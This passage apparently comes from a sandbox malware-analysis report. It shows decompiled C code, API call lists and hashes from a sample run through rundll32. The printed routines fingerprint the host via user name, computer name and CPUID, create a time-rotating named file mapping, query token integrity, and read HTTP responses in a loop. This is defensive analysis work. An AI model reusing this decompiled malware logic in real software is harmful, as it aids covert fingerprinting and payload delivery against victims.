                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: d55d034ac82acac21e7aff19cdbbf8b1079f4b903b75cd5b5500ca5924357061
                                • Instruction ID: 0f50bb4536a0ebf1d23d874930be735a6d39010146132036db1d2ef63aa8d2c6
                                • Opcode Fuzzy Hash: d55d034ac82acac21e7aff19cdbbf8b1079f4b903b75cd5b5500ca5924357061
                                • Instruction Fuzzy Hash: DD814B75A41205AFDB20CF98D881BAEB7F5EFD8310F118029E919E7340E7B5EA05CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

Control-flow Graph: rendered as an image in the original report (executed and not-executed blocks were colour-coded); the basic blocks span 4a47a2e-4a47b3a and call GetUserNameW, GetComputerNameW and RtlAllocateHeap, plus the internal routines 4a44f97 and 4a42c0d.
C-Code - Quality: 96%
			/* Host fingerprinting: hashes (E04A42C0D) of the user name and the
			   computer name, plus CPUID leaf-1 results, are XORed into the
			   structure at __esi (offsets 0, 4 and 0xc). Used by the sample to
			   derive a per-machine identifier; useful for detection as a
			   GetUserNameW / GetComputerNameW / cpuid triad (editor's annotation). */
			E04A47A2E(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x4a4d270; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E04A44F97( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x4a4d2a4 ^ 0x46d76429;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x4a4d238, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E04A42C0D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0x4a4d238, 0, _t62);
                                						}
                                					}
                                				}
				_t61 = __imp__; /* decompiler artifact: _t61 is the EBX value consumed after cpuid below, not an import */
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x4a4d238, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04A42C0D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0x4a4d238, 0, _t68);
                                					}
                                				}
				asm("cpuid"); /* leaf 1 (EAX = 1): vendor/feature bits; the four stores below are the decompiler's rendering of EAX, EBX, ECX, EDX spilled to _v28.._v16 */
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28; /* fold the cpuid registers into one word */
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

Instruction addresses 0x04a47a2e-0x04a47b3a (the per-statement address column shown beside the decompiled code in the original view).

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04A47A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A47A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 04A47A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04A430EE), ref: 04A47AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A47AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A47AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A47AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04A430EE), ref: 04A47B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: 9d7dd2e5e97e2d903c4521ed6a76fe595aff0af0ee48d79e921ed436663e034b
                                • Instruction ID: b1e389200c798be9d4d1994a1a7284745b05822c9d5726bd06f9af58cb673a08
                                • Opcode Fuzzy Hash: 9d7dd2e5e97e2d903c4521ed6a76fe595aff0af0ee48d79e921ed436663e034b
                                • Instruction Fuzzy Hash: C831087AA00205EFEB10DFA9DD80A6EB7F9EFD8314B614469E505D7250EB35EE029B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

C-Code - Quality: 74%
			/* Opens (or attaches to) a named file mapping whose name is derived
			   from the current time divided by a two-day window, i.e. a
			   time-rotating mutex/section name. Returns 0 on success, 2 if the
			   section did not already exist, else the Win32 error (editor's
			   annotation). */
			E04A48E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				intOrPtr _t5;  /* string-table pointers computed below; declared here (missing in the decompiler output) */
				intOrPtr _t6;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000); /* divisor 0x19254D38000 = 1,728,000,000,000 100-ns units = 48 h */
				_push(_v8);
				_push(_v12);
				L04A4AF68(); /* _aulldiv: FILETIME / 2 days -> current two-day epoch number */
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x4a4d2a8; // 0x40a5a8
                                				_t5 = _t13 + 0x4a4e87e; // 0x4e58e26
                                				_t6 = _t13 + 0x4a4e59c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L04A4AC0A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x4a4d2ac, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
					if(GetLastError() == 0xb7) { /* ERROR_ALREADY_EXISTS: another instance created the section first, so attach to it */
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
			}

Instruction addresses 0x04a48e0d-0x04a48ecf (the per-statement address column shown beside the decompiled code in the original view).

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53,?,?), ref: 04A48E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04A48E2F
                                • _snwprintf.NTDLL ref: 04A48E54
                                • CreateFileMappingW.KERNELBASE(000000FF,04A4D2AC,00000004,00000000,00001000,?), ref: 04A48E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53), ref: 04A48E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04A48E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?), ref: 04A48EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04A42FFF,?,?,4D283A53), ref: 04A48EC2
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 812020cb060f22cd990103fd8681214f480efd03e3254c0b5c70ae97e7802ee0
                                • Instruction ID: 0ddea845bb0132f6a9d980251ba7ee6bf808f27c0b2872fcd1a7b4752ca1be54
                                • Opcode Fuzzy Hash: 812020cb060f22cd990103fd8681214f480efd03e3254c0b5c70ae97e7802ee0
                                • Instruction Fuzzy Hash: 4921C0BAA41204BBE711FFA4DC06F8E77B9EBD4720F110124F609EA280E675EA058B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E04A458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                				void* _t17;
                                				void* _t18;
                                				void* _t19;
                                				void* _t20;
                                				void* _t21;
                                				intOrPtr _t24;
                                				void* _t37;
                                				void* _t41;
                                				intOrPtr* _t45;
                                
                                 				_t41 = __edi; // 0x04a458db
                                 				_t37 = __ebx; // 0x04a458db
                                 				_t45 = __eax; // 0x04a458dd
                                 				_t16 =  *((intOrPtr*)(__eax + 0x20)); // 0x04a458df
                                 				if( *((intOrPtr*)(__eax + 0x20)) != 0) { // 0x04a458e6
                                 					E04A429C0(_t16, __ecx, 0xea60); // 0x04a458ed
                                 				} // 0x04a458ed
                                 				_t17 =  *(_t45 + 0x18); // 0x04a458f2
                                 				_push(_t37); // 0x04a458f5
                                 				_push(_t41); // 0x04a458fc
                                 				if(_t17 != 0) { // 0x04a45905
                                 					InternetSetStatusCallback(_t17, 0); // 0x04a45909
                                 					InternetCloseHandle( *(_t45 + 0x18)); // 0x04a4590e executed
                                 				} // 0x04a4590e
                                 				_t18 =  *(_t45 + 0x14); // 0x04a45910
                                 				if(_t18 != 0) { // 0x04a45915
                                 					InternetSetStatusCallback(_t18, 0); // 0x04a45919
                                 					InternetCloseHandle( *(_t45 + 0x14)); // 0x04a4591e
                                 				} // 0x04a4591e
                                 				_t19 =  *(_t45 + 0x10); // 0x04a45920
                                 				if(_t19 != 0) { // 0x04a45925
                                 					InternetSetStatusCallback(_t19, 0); // 0x04a45929
                                 					InternetCloseHandle( *(_t45 + 0x10)); // 0x04a4592e
                                 				} // 0x04a4592e
                                 				_t20 =  *(_t45 + 0x1c); // 0x04a45930
                                 				if(_t20 != 0) { // 0x04a4593b
                                 					CloseHandle(_t20); // 0x04a4593e
                                 				} // 0x04a4593e
                                 				_t21 =  *(_t45 + 0x20); // 0x04a45940
                                 				if(_t21 != 0) { // 0x04a45945
                                 					CloseHandle(_t21); // 0x04a45948
                                 				} // 0x04a45948
                                 				_t22 =  *((intOrPtr*)(_t45 + 8)); // 0x04a4594a
                                 				if( *((intOrPtr*)(_t45 + 8)) != 0) { // 0x04a45951
                                 					E04A48B22(_t22); // 0x04a45954
                                 					 *((intOrPtr*)(_t45 + 8)) = 0; // 0x04a45959
                                 					 *((intOrPtr*)(_t45 + 0x30)) = 0; // 0x04a4595c
                                 				} // 0x04a4595c
                                 				_t23 =  *((intOrPtr*)(_t45 + 0xc)); // 0x04a4595f
                                 				if( *((intOrPtr*)(_t45 + 0xc)) != 0) { // 0x04a45964
                                 					E04A48B22(_t23); // 0x04a45967
                                 				} // 0x04a45967
                                 				_t24 =  *_t45; // 0x04a4596c
                                 				if(_t24 != 0) { // 0x04a45970
                                 					_t24 = E04A48B22(_t24); // 0x04a45973
                                 				} // 0x04a45973
                                 				_t46 =  *((intOrPtr*)(_t45 + 4)); // 0x04a45978
                                 				if( *((intOrPtr*)(_t45 + 4)) != 0) { // 0x04a4597d
                                 					return E04A48B22(_t46); // 0x00000000
                                 				} // 0x04a45980
                                 				return _t24; // 0x04a45987
                                 			}

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45909
                                • InternetCloseHandle.WININET(?), ref: 04A4590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45919
                                • InternetCloseHandle.WININET(?), ref: 04A4591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 04A45929
                                • InternetCloseHandle.WININET(?), ref: 04A4592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A493DC,?,?,00000000,00000000,74E481D0), ref: 04A4593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04A493DC,?,?,00000000,00000000,74E481D0), ref: 04A45948
                                  • Part of subcall function 04A429C0: WaitForMultipleObjects.KERNEL32(00000002,04A4A923,00000000,04A4A923,?,?,?,04A4A923,0000EA60), ref: 04A429DB
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                 • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                 • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: 00b71729bf7b88784300b1944da1edc16d3342fce6ff8ae2ef4201c3335307c0
                                • Instruction ID: bbb19a45dabda2431ed00edadaece27d10150c0f2d236812d2b5315e3826a54f
                                • Opcode Fuzzy Hash: 00b71729bf7b88784300b1944da1edc16d3342fce6ff8ae2ef4201c3335307c0
                                • Instruction Fuzzy Hash: A811F97AA00648BBC630AFEAEC84C1FB7E9FFD53243950D1DE186D3511C725F8498A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 100%
                                			E04A4A2C6(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                 				_v16 = 1; // 0x04a4a2d3
                                 				_v20 = 0x2000; // 0x04a4a2da
                                 				if( *0x4a4d25c > 5) { // 0x04a4a2e1
                                 					_v16 = 0; // 0x04a4a2f5
                                 					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // 0x04a4a300
                                 						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // 0x04a4a318 executed
                                 						_v8 = 0; // 0x04a4a325
                                 						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // 0x04a4a328 executed
                                 						if(_v8 != 0) { // 0x04a4a32d
                                 							_t46 = E04A41525(_v8); // 0x04a4a338
                                 							if(_t46 != 0) { // 0x04a4a33c
                                 								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // 0x04a4a34b executed
                                 								if(_t33 != 0) { // 0x04a4a34f
                                 									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff)); // 0x04a4a36b
                                 								} // 0x04a4a36b
                                 								E04A48B22(_t46); // 0x04a4a36f
                                 							} // 0x04a4a36f
                                 						} // 0x04a4a374
                                 						CloseHandle(_v12); // 0x04a4a378
                                 					} // 0x04a4a37e
                                 				} // 0x04a4a37f
                                 				 *_a4 = _v20; // 0x04a4a386
                                 				return _v16; // 0x04a4a38c
                                 			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04A4A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04A4A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04A4A328
                                • CloseHandle.KERNEL32(00000000), ref: 04A4A378
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04A4A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04A4A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04A4A363
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                 • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                 • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 1e7c48cb6622b6c57fdd158453800cbeae8cd15f7b275d67afa9ec7cd943bbf5
                                • Instruction ID: 007de177dc4f03005e38b1d4d5a52656873cc1ed7174ef4f2f8b4ebb565a7561
                                • Opcode Fuzzy Hash: 1e7c48cb6622b6c57fdd158453800cbeae8cd15f7b275d67afa9ec7cd943bbf5
                                • Instruction Fuzzy Hash: 5C213A7990020CFFEB109FA4DC44EEEBBB9EBC8304F1040A5E511A6290D775AE45EF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                 Control-flow Graph (rendered as an image in the report; legend: • Executed, • Not Executed)

                                 Basic blocks of E04A45988 and their successor blocks, recovered from the flattened graph data:
                                 • 223 4a45988-4a4598f -> 224, 225
                                 • 224 4a45991-4a45998 (call 4a457dd) -> 225, 231
                                 • 225 4a4599a-4a4a574 (ResetEvent, InternetReadFile) -> 229, 230
                                 • 229 4a4a5a5-4a4a5aa -> 234, 235
                                 • 230 4a4a576-4a4a584 (GetLastError) -> 232, 233
                                 • 231 4a459a2-4a459a3 -> (return)
                                 • 232 4a4a586-4a4a594 (call 4a429c0) -> 237, 242
                                 • 233 4a4a59d-4a4a59f -> 229, 237
                                 • 234 4a4a5b0-4a4a5bf -> 240, 241
                                 • 235 4a4a66d -> 237
                                 • 237 4a4a670-4a4a676 -> (return)
                                 • 240 4a4a5c5-4a4a5d4 (call 4a41525) -> 245, 246
                                 • 241 4a4a668-4a4a66b -> 237
                                 • 242 4a4a59a -> 233
                                 • 245 4a4a65a-4a4a65c -> 248
                                 • 246 4a4a5da-4a4a5e2 -> 247
                                 • 247 4a4a5e3-4a4a608 (ResetEvent, InternetReadFile) -> 251, 252
                                 • 248 4a4a65d-4a4a666 -> 237
                                 • 251 4a4a631-4a4a636 -> 253, 255
                                 • 252 4a4a60a-4a4a618 (GetLastError) -> 253, 254
                                 • 253 4a4a641-4a4a64b (call 4a48b22) -> 248, 260
                                 • 254 4a4a61a-4a4a628 (call 4a429c0) -> 253, 261
                                 • 255 4a4a638-4a4a63f -> 247
                                 • 260 4a4a64d-4a4a658 (call 4a448cb) -> 248
                                 • 261 4a4a62a-4a4a62f -> 251, 253
                                C-Code - Quality: 71%
                                			E04A45988(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void _v20;
                                				void* __esi;
                                				void* _t30;
                                				int _t34;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				intOrPtr* _t41;
                                				int _t45;
                                				void* _t54;
                                				long _t64;
                                				void* _t67;
                                				void* _t69;
                                
                                 				_t58 = __ecx; // 0x04a45988
                                 				_t67 = __eax; // 0x04a45989
                                 				if( *((intOrPtr*)(__eax + 0xc)) != 0) { // 0x04a4598f
                                 					L2: // 0x04a4599a
                                 					_t30 = _t67; // 0x04a4599a
                                 					_pop(_t68); // 0x04a4599c
                                 					_t69 = _t30; // 0x04a4a556
                                 					_t64 = 0; // 0x04a4a55b
                                 					ResetEvent( *(_t69 + 0x1c)); // 0x04a4a55d
                                 					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // 0x04a4a56c executed
                                 					if(_t34 != 0) { // 0x04a4a574
                                 						L9: // 0x04a4a5a5
                                 						if(_v8 == 0) { // 0x04a4a5aa
                                 							 *((intOrPtr*)(_t69 + 0x30)) = 0; // 0x04a4a66d
                                 						} else { // 0x04a4a5b0
                                 							 *0x4a4d164(0, 1,  &_v12); // 0x04a4a5b7 executed
                                 							if(0 != 0) { // 0x04a4a5bf
                                 								_t64 = 8; // 0x04a4a66a
                                 							} else { // 0x04a4a5c5
                                 								_t38 = E04A41525(0x1000); // 0x04a4a5ca
                                 								_v16 = _t38; // 0x04a4a5cf
                                 								if(_t38 == 0) { // 0x04a4a5d4
                                 									_t64 = 8; // 0x04a4a65c
                                 								} else { // 0x04a4a5da
                                 									_push(0); // 0x04a4a5da
                                 									_push(_v8); // 0x04a4a5dc
                                 									_push( &_v20); // 0x04a4a5e2
                                 									while(1) { // 0x04a4a5e3
                                 										_t41 = _v12; // 0x04a4a5e3
                                 										_t61 =  *_t41; // 0x04a4a5e6
                                 										 *((intOrPtr*)( *_t41 + 0x10))(_t41); // 0x04a4a5e9
                                 										ResetEvent( *(_t69 + 0x1c)); // 0x04a4a5ef
                                 										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // 0x04a4a600 executed
                                 										if(_t45 != 0) { // 0x04a4a608
                                 											goto L17; // 0x00000000
                                 										} // 0x00000000
                                 										_t64 = GetLastError(); // 0x04a4a610
                                 										if(_t64 == 0x3e5) { // 0x04a4a618
                                 											_t64 = E04A429C0( *(_t69 + 0x1c), _t61, 0xffffffff); // 0x04a4a624
                                 											if(_t64 == 0) { // 0x04a4a628
                                 												_t64 =  *((intOrPtr*)(_t69 + 0x28)); // 0x04a4a62a
                                 												if(_t64 == 0) { // 0x04a4a62f
                                 													goto L17; // 0x00000000
                                 												} // 0x00000000
                                 											} // 0x04a4a62f
                                 										} // 0x04a4a628
                                 										L19: // 0x04a4a641
                                 										E04A48B22(_v16); // 0x04a4a644
                                 										if(_t64 == 0) { // 0x04a4a64b
                                 											_t64 = E04A448CB(_v12, _t69); // 0x04a4a656
                                 										} // 0x04a4a656
                                 										goto L22; // 0x00000000
                                 										L17: // 0x04a4a631
                                 										_t64 = 0; // 0x04a4a631
                                 										if(_v8 != 0) { // 0x04a4a636
                                 											_push(0); // 0x04a4a638
                                 											_push(_v8); // 0x04a4a639
                                 											_push(_v16); // 0x04a4a63c
                                 											continue; // 0x00000000
                                 										} // 0x04a4a63c
                                 										goto L19; // 0x00000000
                                 									} // 0x04a4a636
                                 								} // 0x04a4a5e3
                                 								L22: // 0x04a4a65d
                                 								_t39 = _v12; // 0x04a4a65d
                                 								 *((intOrPtr*)( *_t39 + 8))(_t39); // 0x04a4a663
                                 							} // 0x04a4a663
                                 						} // 0x04a4a5bf
                                 					} else { // 0x04a4a576
                                 						_t64 = GetLastError(); // 0x04a4a57c
                                 						if(_t64 != 0x3e5) { // 0x04a4a584
                                 							L8: // 0x04a4a59d
                                 							if(_t64 == 0) { // 0x04a4a59f
                                 								goto L9; // 0x00000000
                                 							} // 0x00000000
                                 						} else { // 0x04a4a586
                                 							_t64 = E04A429C0( *(_t69 + 0x1c), _t58, 0xffffffff); // 0x04a4a590
                                 							if(_t64 == 0) { // 0x04a4a594
                                 								_t64 =  *((intOrPtr*)(_t69 + 0x28)); // 0x04a4a59a
                                 								goto L8; // 0x00000000
                                 							} // 0x04a4a59a
                                 						} // 0x04a4a594
                                 					} // 0x04a4a584
                                 					return _t64; // 0x04a4a676
                                 				} else { // 0x04a45991
                                 					_t54 = E04A457DD(__ecx, __eax); // 0x04a45991
                                 					if(_t54 != 0) { // 0x04a45998
                                 						return _t54; // 0x04a459a3
                                 					} else { // 0x00000000
                                 						goto L2; // 0x00000000
                                 					} // 0x00000000
                                 				} // 0x04a45998
                                 			}

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04A4A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 04A4A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04A4A576
                                • ResetEvent.KERNEL32(?), ref: 04A4A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 04A4A600
                                • GetLastError.KERNEL32 ref: 04A4A60A
                                  • Part of subcall function 04A457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04A457F4
                                  • Part of subcall function 04A457DD: SetEvent.KERNEL32(?), ref: 04A45804
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A45836
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4585B
                                  • Part of subcall function 04A457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4587B
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                 • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                 • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                 • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: 211164b52f50e2377eac241b182bea0ae85425f9e1e7b93b3c378d27fbfcc0d4
                                • Instruction ID: 0c6371c0ccac2a8f01b127c982baf47a4f45a698108c95b33acaf3c2d1557a8e
                                • Opcode Fuzzy Hash: 211164b52f50e2377eac241b182bea0ae85425f9e1e7b93b3c378d27fbfcc0d4
                                • Instruction Fuzzy Hash: 7641E236A40600EFEB219FA5DD44FAEB3B9EFC8360F210528E556D7190EB70F9429B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E04A42789(void* __ecx, void* __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				void* _t10;
                                				void* _t12;
                                				int _t14;
                                				signed int _t16;
                                				void* _t18;
                                				signed int _t19;
                                				unsigned int _t23;
                                				void* _t27;
                                				signed int _t34;
                                
                                 				_t27 = __edx; // 0x04a42789
                                 				_push(__ecx); // 0x04a4278f
                                 				_push(__ecx); // 0x04a42790
                                 				_t10 = HeapCreate(0, 0x400000, 0); // 0x04a4279c executed
                                 				 *0x4a4d238 = _t10; // 0x04a427a2
                                 				if(_t10 != 0) { // 0x04a427a9
                                 					 *0x4a4d1a8 = GetTickCount(); // 0x04a427b9
                                 					_t12 = E04A49EBB(_a4); // 0x04a427be
                                 					if(_t12 == 0) { // 0x04a427c5
                                 						do { // 0x04a427c7
                                 							GetSystemTimeAsFileTime( &_v12); // 0x04a427cc
                                 							_t14 = SwitchToThread(); // 0x04a427d2
                                 							_t23 = _v12.dwHighDateTime; // 0x04a427d8
                                 							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5; // 0x04a427e2
                                 							_push(0); // 0x04a427e6
                                 							_push(0x13); // 0x04a427e8
                                 							_push(_t23 >> 5); // 0x04a427ed
                                 							_push(_t16); // 0x04a427ee
                                 							L04A4B0CA(); // 0x04a427ef
                                 							_t34 = _t14 + _t16; // 0x04a427f4
                                 							_t18 = E04A4122B(_a4, _t34); // 0x04a427fa
                                 							_t19 = 3; // 0x04a42805
                                 							_t26 = _t34 & 0x00000007; // 0x04a42806
                                 							Sleep(_t19 << (_t34 & 0x00000007)); // 0x04a4280c executed
                                 						} while (_t18 == 1); // 0x04a42812
                                 						if(E04A44D4D(_t26) != 0) { // 0x04a4281e
                                 							 *0x4a4d260 = 1; // 0x04a42820 executed
                                 						} // 0x04a42820
                                 						_t12 = E04A42F70(_t27); // 0x04a4282a executed
                                 					} // 0x04a4282a
                                 				} else { // 0x04a427ab
                                 					_t12 = 8; // 0x04a427ad
                                 				} // 0x04a427ad
                                 				return _t12; // 0x04a42834
                                 			}

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A4279C
                                • GetTickCount.KERNEL32 ref: 04A427B0
